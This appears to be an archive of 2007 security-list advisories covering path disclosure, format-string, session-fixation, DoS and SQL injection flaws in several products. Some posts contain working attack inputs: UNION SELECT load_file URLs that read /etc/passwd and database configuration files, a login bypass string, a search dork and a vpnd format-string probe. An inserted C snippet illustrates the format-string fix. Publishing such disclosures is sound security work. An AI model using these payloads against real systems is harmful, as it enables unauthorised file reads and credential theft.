myEvent version 1.6 Multiple Path Disclosure Vulnerabilities

2007-05-29 Thread securityresearch
netVigilance Security Advisory #24

myEvent version 1.6 Multiple Path Disclosure Vulnerabilities 

Description:
myEvent is a Dynamic Calendar based Events Management system with an admin panel 
for adding, editing and deleting events, built using PHP & mySQL. It displays 
today's event and future event links on the calendar; an event is displayed in 
3 modes, e.g. pop-up, new window or on the same screen, once the link is 
clicked. There is also a mouse-over tool tip to display the events. Template 
based and simple, easily integrated into any website.
External References: 
Mitre CVE:  CVE-2007-0690
NVD NIST: CVE-2007-0690
OSVDB: 34272

Summary: 
myEvent is a Dynamic Calendar based Events Management system with an admin panel 
for adding, editing and deleting events, built using PHP and mySQL.

Multiple path disclosure vulnerabilities in the product allow attackers to 
gather the true path of the server-side script.


Advisory URL: 
http://www.netvigilance.com/advisory0024 

Release Date:
05/28/2007 

Severity:
Risk: Low
 
CVSS Metrics
Access Vector: Remote
Access Complexity: Low
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 2.3
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
 
Vulnerability Impact: Attack
Host Impact: Path disclosure.
SecureScout Testcase ID:
TC 17954

Vulnerable Systems:
myEvent version 1.6

Vulnerability Type:
Program flaw - The myevent.php and login.php scripts have flaws which lead to 
warnings or even fatal errors.

Vendor:
myWebland
Vendor Status: 
The Vendor has been notified several times on many different email addresses 
last on 15 May 2007. The Vendor has not responded. There is no official fix at 
the release of this Security Advisory.

Workaround:
Disable warning messages: in the php.ini file set the following line: 
display_errors = Off. Or modify the .htaccess file (this will work only for 
Apache servers). 
Example: 
Path Disclosure Vulnerability 1:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/myevent.php?monthno[]=2&year=2007
REPLY:
<b>Warning</b>:  htmlspecialchars() expects parameter 1 to be string, array 
given in <b>[DISCLOSED PATH]\[PRODUCT-DIRECTORY]\initialize.php</b> on line 
<b>71</b><br />
Path Disclosure Vulnerability 2:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/myevent.php?view[]=1
REPLY:
<b>Warning</b>:  htmlspecialchars() expects parameter 1 to be string, array 
given in <b>[DISCLOSED PATH]\[PRODUCT-DIRECTORY]\initialize.php</b> on line 
<b>83</b><br />
Path Disclosure Vulnerability 3:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/login.php
Enter Login but do not enter password. Click Log In
REPLY:
<b>Fatal error</b>:  Call to undefined function:  notice() in <b>[DISCLOSED 
PATH]\[PRODUCT-DIRECTORY]\login.php</b> on line <b>29</b><br />
Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com


Mac OS X vpnd local format string

2007-05-29 Thread NGSSoftware Insight Security Research
===
Summary
===
Name: Mac OS X vpnd local format string
Release Date: 29 May 2007
Reference: NGS00496
Discoverer: Chris Anley [EMAIL PROTECTED]
Vendor: Apple
Vendor Reference: 26417237
CVE-ID: CVE-2007-0753
Systems Affected: OS X Server 10.4.9 and prior
Risk: High
Status: Published


===
TimeLine
===
Discovered: 15 March 2007
Reported: 19 March 2007
Fixed: 24 May 2007
Published: 29 May 2007

===
Description
===
The 'vpnd' command shipped with OS X runs setuid root, and is vulnerable
to a format string attack.

===
Technical Details
===
The vpnd command, when run with the '-i' parameter, is vulnerable to a
format string attack. The command is setuid root, and is world-executable.

This allows any local user to execute arbitrary code as root, though the
vulnerable code is only accessible by default on server versions of OS
X. It is possible for a client version of OS X to be configured in a
vulnerable manner, though this requires extensive configuration changes
and is unlikely to happen by accident.

Demonstration:

Apple:~ shellcoders$ sw_vers
ProductName:Mac OS X Server
ProductVersion: 10.4.9
BuildVersion:   8P135
Apple:~ shellcoders$ vpnd -n -i _ABCD_%268\$x
2007-03-15 17:07:07 GMT Server '_ABCD_%268$x' starting...
2007-03-15 17:07:07 GMT Server ID '_ABCD_41424344' invalid
2007-03-15 17:07:07 GMT Error processing prefs file


(gdb) bt
#0  0x90011cb8 in __vfprintf ()
#1  0x9002a90c in vsnprintf ()
#2  0x9002a41c in vsyslog ()
#3  0x3150 in vpnlog ()
#4  0x4b80 in process_prefs ()
#5  0x28d4 in main ()

The source code for vpnd is available from the Apple Darwin source code
download site. The relevant code is in the ppp package. The code is
distributed under the Apple Public Source License, available at
http://www.opensource.apple.com/apsl/

The bug occurs in the process_prefs() function in vpnoptions.c.

The user-specified server name is passed into the snprintf() function as
data, and the resulting string is then passed to the vpnlog() function,
as the format_str parameter. Although the server name is limited to 64
characters (with '%.64s') it is still straightforward to exploit the
bug, and NGS have written a reliable exploit.

===
Fix Information
===
This issue was fixed by Apple in Security Update 2007-005, released on
the 24th May 2007. NGS would like to thank the Apple Security Team for
their professional and prompt response to this issue.


NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402
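The pattern the advisory describes, as an added C illustration that is neither Apple's vpnd code nor NGS's exploit: the server name is first formatted as data by snprintf() and then reaches vpnlog() as its format argument, shown beside the hardened call that keeps the format a literal. The vpnlog() stand-in, the buffer sizes and the server_name_is_acceptable() check are assumptions, not taken from the vpnd source.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for the vsyslog() sink reached through vpnlog(): the formatted
 * line is kept in a buffer so the result can be inspected instead of being
 * written to syslog.  (Assumed test scaffolding, not vpnd code.) */
static char last_log_line[256];

/* vpnlog() takes a printf-style format, which is exactly why the caller must
 * never put user data in the fmt slot.  Build with
 *   -DCHECK_FORMATS -Wformat-security
 * and gcc/clang flag the unsafe call in log_server_start_unsafe() at compile
 * time; the attribute is kept optional here so the file also builds plain. */
#ifdef CHECK_FORMATS
__attribute__((format(printf, 1, 2)))
#endif
static void vpnlog(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(last_log_line, sizeof last_log_line, fmt, ap);
    va_end(ap);
}

/* Shape of the bug described in the advisory (process_prefs() in
 * vpnoptions.c): the user-chosen server name is placed into a message as
 * DATA by snprintf(), but the finished message is then handed to vpnlog()
 * as its FORMAT, so any '%' conversions inside the name are interpreted.
 * The '%.64s' cap bounds the length, not the conversions.  Kept only for
 * contrast; it must never see untrusted input. */
static const char *log_server_start_unsafe(const char *server_name)
{
    char msg[128];
    snprintf(msg, sizeof msg, "Server '%.64s' starting...", server_name);
    vpnlog(msg);                 /* BUG: attacker-influenced format string */
    return last_log_line;
}

/* Hardened form: the format is a literal and the message travels as an
 * argument, so its bytes are copied verbatim whatever they contain. */
static const char *log_server_start_safe(const char *server_name)
{
    char msg[128];
    snprintf(msg, sizeof msg, "Server '%.64s' starting...", server_name);
    vpnlog("%s", msg);           /* literal format, data as an argument */
    return last_log_line;
}

/* Defence in depth for a setuid program: a server name has no business
 * containing '%' at all, so reject it before any logging path sees it.
 * The 64-character limit mirrors the '%.64s' cap noted in the advisory. */
static int server_name_is_acceptable(const char *server_name)
{
    size_t len = strlen(server_name);
    return len > 0 && len <= 64 && strchr(server_name, '%') == NULL;
}

int main(void)
{
    /* "100%%" is a harmless probe: it is itself a valid format string, so
     * the two paths can be compared without undefined behaviour.  The
     * unsafe path collapses "%%" to "%", proving the name was interpreted
     * as a format; the safe path logs it unchanged. */
    printf("unsafe: %s\n", log_server_start_unsafe("100%%"));
    printf("safe:   %s\n", log_server_start_safe("100%%"));
    printf("accept '_ABCD_%%268$x'? %d\n",
           server_name_is_acceptable("_ABCD_%268$x"));
    return 0;
}
```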


[MajorSecurity Advisory #48]eggblog - Session fixation Issue

2007-05-29 Thread admin
[MajorSecurity Advisory #48]eggblog - Session fixation Issue

Details
===
Product: eggblog 
Affected version: 3.1.0 and prior
Remote-Exploit: yes
Vendor-URL: http://www.eggblog.net
Vendor-Status: informed
Advisory-Status: published

Credits

Discovered by: David Vieira-Kurz
http://www.majorsecurity.de

Original Advisory:

http://www.majorsecurity.de/index_2.php?major_rls=major_rls48

Introduction

eggblog is a free php & mysql package, allowing you to create your own online 
website, journal or weblog (blog). 
-from eggblog.net

More Details

1. Session fixation:
The PHPSESSID parameter can be set to a malicious and arbitrary value.

1.1 Description:
In a session fixation attack, the attacker fixes the user's session ID before 
the user even logs into the target server.
After a user's session ID has been fixed, the attacker will wait for them to 
login.
Once the user does so, the attacker uses the predefined session ID value to 
assume their online identity.

Workaround:

1. Do not accept session identifiers from GET / POST variables.

2. Regenerate SID on each request.

3. Accept only server generated SID:
One way to improve security is to not accept session identifiers that were not 
generated by the server.

session_start();
if ( ! isset( $_SESSION['SERVER_GENERATED_SID'] ) ) {
    $_SESSION = array(); // drop all data tied to an ID the server did not issue
}
session_regenerate_id( true ); // issue a new server-generated ID and delete the old one
$_SESSION['SERVER_GENERATED_SID'] = true; // mark this session as server-generated


History/Timeline

25.05.2007 discovery of the vulnerability
27.05.2007 contacted the vendor
27.05.2007 working patch sent to the vendor
29.05.2007 advisory is written
29.05.2007 advisory released

MajorSecurity
===
MajorSecurity is a non-profit German penetration testing and security research 
project which consists of only one person at the present time.
http://www.majorsecurity.de/


Re: Mac OS X vpnd local format string

2007-05-29 Thread lists

OSX client is also vulnerable and exploitable.

-KF

On May 29, 2007, at 7:26 AM, NGSSoftware Insight Security Research  
wrote:







Apache httpd vulnerabilities

2007-05-29 Thread Blazej Miga
PSNC Security Team has the pleasure to announce that, as a result of 
Apache httpd server (ver. 1.3.x, 2.0.x and 2.2.x) source code analysis, 
several vulnerabilities have been found that make it possible to perform a 
DoS attack against the services and the system that the application is 
running on. Basic information on the found vulnerabilities follows:


Vuln#1
Httpd Server DoS
Test environment: ver. 2.0.59, 2.2.4, prefork mpm module

Appropriate code run in the worker process context makes it possible to 
kill all worker processes while simultaneously blocking the creation of new 
worker processes by the master process. As a result, the server stops 
accepting and handling new connections.


Vuln #2
SIGUSR1 killer
Test environment: ver. 2.0.59, 2.2.4 prefork mpm module

Appropriate code run in the worker process context makes it possible to make 
the master process (which runs with root credentials) send SIGUSR1 signals 
to an arbitrary process within the system.


Vuln #3
SIGUSR1 killer
Test environment: ver 1.3.37

Appropriate code run in the worker process context makes it possible to make 
the master process (which runs with root credentials) send SIGUSR1 signals 
to an arbitrary process within the system.


Vuln #4
System DoS
Test environment: ver 2.0.59, 2.2.4 prefork mpm module

Appropriate code run in the worker process context makes it possible to 
force the master process to create an unlimited number of new worker 
processes. As a result, the activity of the whole system may be blocked.



Countermeasures:

Disable the possibility of running the user's code in the worker process 
context. Special emphasis should be put on programming languages that 
may be configured as an Apache module (like mod_php, mod_perl etc.) in 
order to block dangerous functions, e.g. dl(), dlopen().





The information on the vulnerabilities above was sent to the Apache Software 
Foundation on 16 May, 2006. For over 1 year no official patch has been 
issued. PSNC Security Team is currently working on its own, unofficial 
patches. Our patches will be published on 18 June, 2007 on the team 
webpage (http://security.psnc.pl). On 20 June, 2007 detailed 
information on the found vulnerabilities will be issued.



PSNC Security Team



RedLevel Advisory #23 - SalesCart Shopping Cart SQL Injection Vulnerability

2007-05-29 Thread john
SalesCart Shopping Cart - SQL Injection Vulnerability

SalesCart does not sanitize any forms in cgi-bin/reorder2.asp, allowing an 
attacker to inject arbitrary SQL queries, as well as possible command execution.

Google d0rk: Sorry, you have no Items in your Shopping Cart ! 
inurl:cgi-bin/view1.asp
Vulnerable Variable: All forms in reorder2.asp
Vulnerable File: cgi-bin/reorder2.asp (password: x' OR 'x'='x)
Vendor Status: Notified multiple times, no response. Possible silent patch.

John Martinelli
[EMAIL PROTECTED]

RedLevel Security
RedLevel.org

May 30th, 2007


[security bulletin] HPSBUX02087 SSRT4728 rev.5 - HP-UX running TCP/IP Remote Denial of Service (DoS)

2007-05-29 Thread security-alert

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00579189
Version: 5

HPSBUX02087 SSRT4728 rev.5 - HP-UX running TCP/IP Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2005-12-09
Last Updated: 2007-05-21

Potential Security Impact: Remote Denial of Service (DoS) 

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running 
TCP/IP. 
The potential vulnerability could be exploited remotely to cause a Denial of 
Service (DoS). 

References: CVE-2004-0744

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.04, B.11.11, B.11.23 running TCP/IP. 

BACKGROUND

To determine if an HP-UX system has an affected version, 
search the output of swlist -a revision -l fileset 
for one of the filesets listed below. For affected systems 
verify that the recommended action has been taken. 

AFFECTED VERSIONS 

HP-UX B.11.00 
= 
Streams.STREAMS-KRN 
action: install PHNE_30161 or subsequent 

HP-UX B.11.04 
= 
Networking.NET-KRN 
action: install PHNE_33427 or subsequent and install sqmax (see Resolution 
section) 

HP-UX B.11.11 
= 
Streams.STREAMS-KRN 
action: install PHNE_34131 or subsequent 

HP-UX B.11.23 
= 
Streams.STREAMS2-KRN 
action: install PHKL_31500 or subsequent 

END AFFECTED VERSIONS 

RESOLUTION

HP has made patches and product updates available to resolve the issue. 
After installing the recommended patches for B.11.04 
a system parameter must be set. A utility, sqmax, must be 
downloaded and installed to set the required system parameter as 
discussed below. 

B.11.00 install PHNE_30161 or subsequent, sqmax not required
 
B.11.04 install PHNE_33427 or subsequent, then install sqmax as discussed below
 
B.11.11 install PHNE_34131 or subsequent, sqmax not required
 
B.11.23 install PHKL_31500 or subsequent, sqmax not required

The patches are available from http://itrc.hp.com 

For B.11.04: 
After the patches listed above are installed an internal system parameter 
must be set. A utility, sqmax, has been provided to set the parameter. 
The sqmax utility is available by writing to [EMAIL PROTECTED] 

MANUAL ACTIONS: Yes - NonUpdate 
B.11.04 - After installing patch, install sqmax. Run /usr/contrib/bin/sqmax 
1000 or reboot. 

PRODUCT SPECIFIC INFORMATION 

HP-UX Security Patch Check: Security Patch Check revision B.02.00 
analyzes all HP-issued Security Bulletins to provide a subset of 
recommended actions that potentially affect a specific HP-UX 
system. For more information: 
http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA
 

HISTORY 
Version:1 (rev.1) 14 December 2005 Initial release 
Version:2 (rev.2) 24 July 2006 New sqmax utility for B.11.04, augmented 
installation instructions 
Version:3 (rev.3) 31 July 2006 PHNE_34131 is available for B.11.11 
Version:4 (rev.4) 09 October 2006 PHNE_30161 is available for B.11.00 
Version:5 (rev.5) 21 May 2007 Corrected fileset information for PHNE_30161 

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP 

Re: DGNews version 2.1 SQL Injection Vulnerability

2007-05-29 Thread laurent . gaffie
hi there

there's also another sql injection on this script:
news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7%20from%20news_comment/*
//result: This news has 1 comments. Please read, or post one by click here.
* 5 (by: root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:...

read the database credentials in plain text:
news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870),4,5,6,7%20from%20news_comment/*
//information is in the source code.
* 
0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870
 = /usr/local/apache2/htdocs/dgnews/admin/conf.php 

PS: works regardless of php.ini settings.

regards laurent gaffie


cpcommerce v1.1.0 [sql injection]

2007-05-29 Thread laurent . gaffie
vendor site:http://cpcommerce.cpradio.org/
product:cpcommerce  v1.1.0
bug: sql injection
risk : high
note:works regardless of php.ini settings .
 
http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0/**/from/**/cpAccounts/*
 
//result:
 Information about '8725ade7b722d1ad43b7b949162eab4d'
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh
...
http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,email,0/**/from/**/cpAccounts/*
//result:
 Information about '8725ade7b722d1ad43b7b949162eab4d'
[EMAIL PROTECTED]

read database credentials in plain text:
http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870),pass,0/**/from/**/cpAccounts/*
//result:Products in '..
// Database Information 
$config['host'] = localhost; // Database Host $config['user'] = my_user; // 
Database Username $config['pass'] = my_password; // Database Password 
$config['database'] = hi; // Database Name $config['prefix'] = cp;
...
'8725ade7b722d1ad43b7b949162eab4d'

ps1: 
0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870
-- /usr/local/apache2/htdocs/cpcommerce/_config.php

ps2: /**/cpAccounts/* -- cp = prefix. 
Accounts -- table_name .
(cp is the default one) so you can try with your table prefix .

regards laurent gaffie


Full Path Disclosure in Almnzm

2007-05-29 Thread xx_hack_xx_2004
Hello
Vulnerable : Almnzm
Web : http://www.almnzm.com

Exploit :
http://example.com/almnzm/index.php?action=activateorder&orderid=['Anything']



Discovered By Linux_Drox
www.LeZr.Com

Best Regards 


n.runs-SA-2007.011 - Avira Antivir Antivirus UPX parsing Divide by Zero Advisory

2007-05-29 Thread security
n.runs AG  
http://www.nruns.com/ security(at)nruns.com
n.runs-SA-2007.011   29-May-2007


Vendor:Avira GmbH, http://www.avira.com
Affected Product:  Avira Antivir Antivirus
Vulnerability: Divide by Zero Engine DoS (remote) 
Risk:  HIGH


Vendor communication:

  2007/05/07    initial notification to Avira GmbH
  2007/05/07    Avira GmbH response
  2007/05/08    PGP public keys exchange
  2007/05/09    PoC files sent to Avira GmbH
  2007/05/10    Avira GmbH acknowledged and validated the PoC files
  2007/05/16    Avira GmbH sent fix release schedule and fixed engine
  2007/05/17    Sergio Alvarez tested fixed engine
  2007/05/23    Avira GmbH released update with fixes


Overview:
 
Avira, a company with over 15 million customers and more than 250 employees,
is a worldwide leading supplier of self-developed security solutions for
professional and private use. With more than 20 years of experience, the
company is one of the pioneers in this field.
In addition to programs specifically for use on single workstations, Avira
primarily offers professional solutions for cross-system protection of
networks on various levels. These include products for workstations, file,
mail and web servers. Gateway computers can be managed as workstation
computers via a central management console for all operating systems. In
addition to the management products of the individual solutions, security
programs for PDAs, smartphones and embedded devices are also offered.
Avira AntiVir Personal, used by millions of private users, represents a
significant contribution to security.

Description:

A remotely exploitable vulnerability has been found in the file parsing
engine.

In detail, the following flaw was determined:

- Divide by Zero in UPX packed files parsing


Impact:

This problem can lead to remote engine denial of service if an attacker
carefully crafts a file that exploits the aforementioned vulnerability. The
vulnerability is present in Avira Antivir Antivirus software versions prior
to the update Version 7.03.00.09. 

Solution: 
The vulnerability was reported on 07.May.2007 and an update has been issued
on 23.May.2007 to solve this vulnerability through the regular update
mechanism.


Credit: 
Bugs found by Sergio Alvarez of n.runs AG. 


References: 
http://forum.antivir-pe.de/thread.php?threadid=22528

This Advisory and Upcoming Advisories:
http://www.nruns.com/parsing-engines-advisories.php


Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
[EMAIL PROTECTED] for permission. Use of the advisory constitutes
acceptance for use in an as is condition. All warranties are excluded. In
no event shall n.runs be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages, even if n.runs has been advised of the possibility of such damages.


Copyright 2007 n.runs AG. All rights reserved. Terms of apply.